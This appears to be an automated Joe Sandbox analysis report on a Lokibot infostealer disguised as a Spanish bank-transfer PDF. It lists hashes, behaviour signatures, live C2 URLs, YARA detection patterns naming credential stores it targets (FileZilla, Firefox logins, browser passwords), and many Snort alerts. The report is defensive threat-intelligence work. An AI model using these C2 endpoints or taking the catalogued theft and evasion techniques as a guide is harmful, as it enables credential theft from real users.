Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
transferencia bancaria.pdf.exe

Overview

General Information

Sample Name:transferencia bancaria.pdf.exe
Analysis ID:736955
MD5:355efb2e1f7dd361f8e7cda449a45eac
SHA1:864f8d367c72d37347e2dc8fa799cc9a2550d66c
SHA256:cb90ea9b90ccb675d555891bcbfb224edf1bbfe7a650e9600508c93660ec09eb
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Lokibot
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gl21/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
    • 0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
    00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            Click to see the 29 entries
            SourceRuleDescriptionAuthorStrings
            1.0.transferencia bancaria.pdf.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
            • 0x13e78:$s1: http://
            • 0x17633:$s1: http://
            • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
            • 0x13e80:$s2: https://
            • 0x13e78:$f1: http://
            • 0x17633:$f1: http://
            • 0x13e80:$f2: https://
            1.0.transferencia bancaria.pdf.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              1.0.transferencia bancaria.pdf.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                1.0.transferencia bancaria.pdf.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                  1.0.transferencia bancaria.pdf.exe.400000.0.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                  • 0x16536:$f1: FileZilla\recentservers.xml
                  • 0x16576:$f2: FileZilla\sitemanager.xml
                  • 0x147e6:$b2: Mozilla\Firefox\Profiles
                  • 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • 0x146fa:$s4: logins.json
                  • 0x155a4:$s6: wand.dat
                  • 0x14024:$a1: username_value
                  • 0x14014:$a2: password_value
                  • 0x1465f:$a3: encryptedUsername
                  • 0x146cc:$a3: encryptedUsername
                  • 0x14672:$a4: encryptedPassword
                  • 0x146e0:$a4: encryptedPassword
                  Click to see the 45 entries
                  No Sigma rule has matched
                  Timestamp:192.168.2.691.142.77.4549712802024318 11/03/22-12:30:22.162497
                  SID:2024318
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549727802024313 11/03/22-12:31:01.987085
                  SID:2024313
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549723802825766 11/03/22-12:30:53.367985
                  SID:2825766
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549724802021641 11/03/22-12:30:54.913991
                  SID:2021641
                  Source Port:49724
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.859881532014169 11/03/22-12:31:01.170102
                  SID:2014169
                  Source Port:59881
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.68.8.8.856122532014169 11/03/22-12:30:45.704907
                  SID:2014169
                  Source Port:56122
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549741802825766 11/03/22-12:31:39.946873
                  SID:2825766
                  Source Port:49741
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549745802024313 11/03/22-12:31:50.569101
                  SID:2024313
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549728802025381 11/03/22-12:31:03.903902
                  SID:2025381
                  Source Port:49728
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549739802021641 11/03/22-12:31:35.606377
                  SID:2021641
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549738802825766 11/03/22-12:31:33.019427
                  SID:2825766
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549713802025381 11/03/22-12:30:25.414440
                  SID:2025381
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549731802025381 11/03/22-12:31:09.511791
                  SID:2025381
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549737802024318 11/03/22-12:31:31.046497
                  SID:2024318
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549713802825766 11/03/22-12:30:25.414440
                  SID:2825766
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497182025483 11/03/22-12:30:41.067853
                  SID:2025483
                  Source Port:80
                  Destination Port:49718
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497092025483 11/03/22-12:30:17.656419
                  SID:2025483
                  Source Port:80
                  Destination Port:49709
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.850343532014169 11/03/22-12:31:05.602892
                  SID:2014169
                  Source Port:50343
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549717802024318 11/03/22-12:30:35.019960
                  SID:2024318
                  Source Port:49717
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549717802024313 11/03/22-12:30:35.019960
                  SID:2024313
                  Source Port:49717
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.856569532014169 11/03/22-12:31:22.519121
                  SID:2014169
                  Source Port:56569
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:91.142.77.45192.168.2.680497122025483 11/03/22-12:30:23.556931
                  SID:2025483
                  Source Port:80
                  Destination Port:49712
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549729802021641 11/03/22-12:31:05.707382
                  SID:2021641
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549742802021641 11/03/22-12:31:41.893270
                  SID:2021641
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.853943532014169 11/03/22-12:30:54.819244
                  SID:2014169
                  Source Port:53943
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549730802024318 11/03/22-12:31:07.626823
                  SID:2024318
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497102025483 11/03/22-12:30:19.791139
                  SID:2025483
                  Source Port:80
                  Destination Port:49710
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549735802024313 11/03/22-12:31:27.516452
                  SID:2024313
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549721802025381 11/03/22-12:30:48.032802
                  SID:2025381
                  Source Port:49721
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.855629532014169 11/03/22-12:31:09.419344
                  SID:2014169
                  Source Port:55629
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549731802825766 11/03/22-12:31:09.511791
                  SID:2825766
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549738802025381 11/03/22-12:31:33.019427
                  SID:2025381
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549712802024313 11/03/22-12:30:22.162497
                  SID:2024313
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497142025483 11/03/22-12:30:29.899760
                  SID:2025483
                  Source Port:80
                  Destination Port:49714
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497162025483 11/03/22-12:30:34.572782
                  SID:2025483
                  Source Port:80
                  Destination Port:49716
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549706802021641 11/03/22-12:30:09.785093
                  SID:2021641
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549730802024313 11/03/22-12:31:07.626823
                  SID:2024313
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.861609532014169 11/03/22-12:30:50.734926
                  SID:2014169
                  Source Port:61609
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.68.8.8.862958532014169 11/03/22-12:31:41.802948
                  SID:2014169
                  Source Port:62958
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549735802024318 11/03/22-12:31:27.516452
                  SID:2024318
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.849232532014169 11/03/22-12:31:30.955921
                  SID:2014169
                  Source Port:49232
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.68.8.8.862848532014169 11/03/22-12:31:45.492508
                  SID:2014169
                  Source Port:62848
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549733802025381 11/03/22-12:31:22.614964
                  SID:2025381
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549732802021641 11/03/22-12:31:20.467945
                  SID:2021641
                  Source Port:49732
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549720802024318 11/03/22-12:30:45.793165
                  SID:2024318
                  Source Port:49720
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549718802025381 11/03/22-12:30:37.003049
                  SID:2025381
                  Source Port:49718
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549721802825766 11/03/22-12:30:48.032802
                  SID:2825766
                  Source Port:49721
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549720802024313 11/03/22-12:30:45.793165
                  SID:2024313
                  Source Port:49720
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549714802024318 11/03/22-12:30:27.432237
                  SID:2024318
                  Source Port:49714
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549719802024318 11/03/22-12:30:42.564459
                  SID:2024318
                  Source Port:49719
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549725802024313 11/03/22-12:30:57.918358
                  SID:2024313
                  Source Port:49725
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549715802825766 11/03/22-12:30:31.132672
                  SID:2825766
                  Source Port:49715
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549719802024313 11/03/22-12:30:42.564459
                  SID:2024313
                  Source Port:49719
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549710802825766 11/03/22-12:30:18.297577
                  SID:2825766
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549734802021641 11/03/22-12:31:25.377976
                  SID:2021641
                  Source Port:49734
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.862910532014169 11/03/22-12:30:27.345778
                  SID:2014169
                  Source Port:62910
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:91.142.77.45192.168.2.680497352025483 11/03/22-12:31:28.883670
                  SID:2025483
                  Source Port:80
                  Destination Port:49735
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549737802021641 11/03/22-12:31:31.046497
                  SID:2021641
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497422025483 11/03/22-12:31:43.475626
                  SID:2025483
                  Source Port:80
                  Destination Port:49742
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549714802024313 11/03/22-12:30:27.432237
                  SID:2024313
                  Source Port:49714
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549711802025381 11/03/22-12:30:20.264286
                  SID:2025381
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549722802024313 11/03/22-12:30:50.822444
                  SID:2024313
                  Source Port:49722
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.856331532014169 11/03/22-12:30:13.938466
                  SID:2014169
                  Source Port:56331
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.68.8.8.849448532014169 11/03/22-12:30:17.960732
                  SID:2014169
                  Source Port:49448
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.68.8.8.850506532014169 11/03/22-12:30:15.990659
                  SID:2014169
                  Source Port:50506
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.68.8.8.859752532014169 11/03/22-12:31:35.521025
                  SID:2014169
                  Source Port:59752
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549722802024318 11/03/22-12:30:50.822444
                  SID:2024318
                  Source Port:49722
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549726802021641 11/03/22-12:30:59.657451
                  SID:2021641
                  Source Port:49726
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549741802025381 11/03/22-12:31:39.946873
                  SID:2025381
                  Source Port:49741
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497392025483 11/03/22-12:31:37.318947
                  SID:2025483
                  Source Port:80
                  Destination Port:49739
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549709802021641 11/03/22-12:30:16.075566
                  SID:2021641
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549727802024318 11/03/22-12:31:01.987085
                  SID:2024318
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549728802825766 11/03/22-12:31:03.903902
                  SID:2825766
                  Source Port:49728
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497312025483 11/03/22-12:31:10.691873
                  SID:2025483
                  Source Port:80
                  Destination Port:49731
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.865198532014169 11/03/22-12:30:25.312645
                  SID:2014169
                  Source Port:65198
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549721802021641 11/03/22-12:30:48.032802
                  SID:2021641
                  Source Port:49721
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549715802024318 11/03/22-12:30:31.132672
                  SID:2024318
                  Source Port:49715
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549726802825766 11/03/22-12:30:59.657451
                  SID:2825766
                  Source Port:49726
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549724802024313 11/03/22-12:30:54.913991
                  SID:2024313
                  Source Port:49724
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549710802025381 11/03/22-12:30:18.297577
                  SID:2025381
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549712802021641 11/03/22-12:30:22.162497
                  SID:2021641
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549735802825766 11/03/22-12:31:27.516452
                  SID:2825766
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549744802825766 11/03/22-12:31:45.577786
                  SID:2825766
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549740802021641 11/03/22-12:31:37.627027
                  SID:2021641
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549743802024318 11/03/22-12:31:43.782645
                  SID:2024318
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549743802024313 11/03/22-12:31:43.782645
                  SID:2024313
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549707802025381 11/03/22-12:30:11.977904
                  SID:2025381
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549726802025381 11/03/22-12:30:59.657451
                  SID:2025381
                  Source Port:49726
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549725802024318 11/03/22-12:30:57.918358
                  SID:2024318
                  Source Port:49725
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549707802825766 11/03/22-12:30:11.977904
                  SID:2825766
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497342025483 11/03/22-12:31:27.178865
                  SID:2025483
                  Source Port:80
                  Destination Port:49734
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549731802021641 11/03/22-12:31:09.511791
                  SID:2021641
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.852481532014169 11/03/22-12:30:53.275834
                  SID:2014169
                  Source Port:52481
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549720802025381 11/03/22-12:30:45.793165
                  SID:2025381
                  Source Port:49720
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.864404532014169 11/03/22-12:31:43.694917
                  SID:2014169
                  Source Port:64404
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549708802025381 11/03/22-12:30:14.035064
                  SID:2025381
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549735802021641 11/03/22-12:31:27.516452
                  SID:2021641
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549706802024317 11/03/22-12:30:09.785093
                  SID:2024317
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497322025483 11/03/22-12:31:21.820409
                  SID:2025483
                  Source Port:80
                  Destination Port:49732
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.852865532014169 11/03/22-12:31:37.538077
                  SID:2014169
                  Source Port:52865
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549725802825766 11/03/22-12:30:57.918358
                  SID:2825766
                  Source Port:49725
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497292025483 11/03/22-12:31:07.339016
                  SID:2025483
                  Source Port:80
                  Destination Port:49729
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549724802024318 11/03/22-12:30:54.913991
                  SID:2024318
                  Source Port:49724
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549706802024312 11/03/22-12:30:09.785093
                  SID:2024312
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497212025483 11/03/22-12:30:50.362964
                  SID:2025483
                  Source Port:80
                  Destination Port:49721
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497232025483 11/03/22-12:30:54.557575
                  SID:2025483
                  Source Port:80
                  Destination Port:49723
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549739802025381 11/03/22-12:31:35.606377
                  SID:2025381
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.863863532014169 11/03/22-12:30:30.240421
                  SID:2014169
                  Source Port:63863
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549744802021641 11/03/22-12:31:45.577786
                  SID:2021641
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549745802025381 11/03/22-12:31:50.569101
                  SID:2025381
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549736802025381 11/03/22-12:31:29.221112
                  SID:2025381
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549741802021641 11/03/22-12:31:39.946873
                  SID:2021641
                  Source Port:49741
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549742802025381 11/03/22-12:31:41.893270
                  SID:2025381
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.862538532014169 11/03/22-12:30:34.919732
                  SID:2014169
                  Source Port:62538
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.68.8.8.858595532014169 11/03/22-12:30:11.893252
                  SID:2014169
                  Source Port:58595
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549716802021641 11/03/22-12:30:32.992651
                  SID:2021641
                  Source Port:49716
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549728802024313 11/03/22-12:31:03.903902
                  SID:2024313
                  Source Port:49728
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549725802021641 11/03/22-12:30:57.918358
                  SID:2021641
                  Source Port:49725
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549728802024318 11/03/22-12:31:03.903902
                  SID:2024318
                  Source Port:49728
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.68.8.8.855956532014169 11/03/22-12:31:47.481296
                  SID:2014169
                  Source Port:55956
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.691.142.77.4549734802024313 11/03/22-12:31:25.377976
                  SID:2024313
                  Source Port:49734
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549719802021641 11/03/22-12:30:42.564459
                  SID:2021641
                  Source Port:49719
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549723802025381 11/03/22-12:30:53.367985
                  SID:2025381
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549737802024313 11/03/22-12:31:31.046497
                  SID:2024313
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549740802024313 11/03/22-12:31:37.627027
                  SID:2024313
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549717802025381 11/03/22-12:30:35.019960
                  SID:2025381
                  Source Port:49717
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.691.142.77.4549734802024318 11/03/22-12:31:25.377976
                  SID:2024318
                  Source Port:49734
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.142.77.45192.168.2.680497372025483 11/03/22-12:31:32.671321
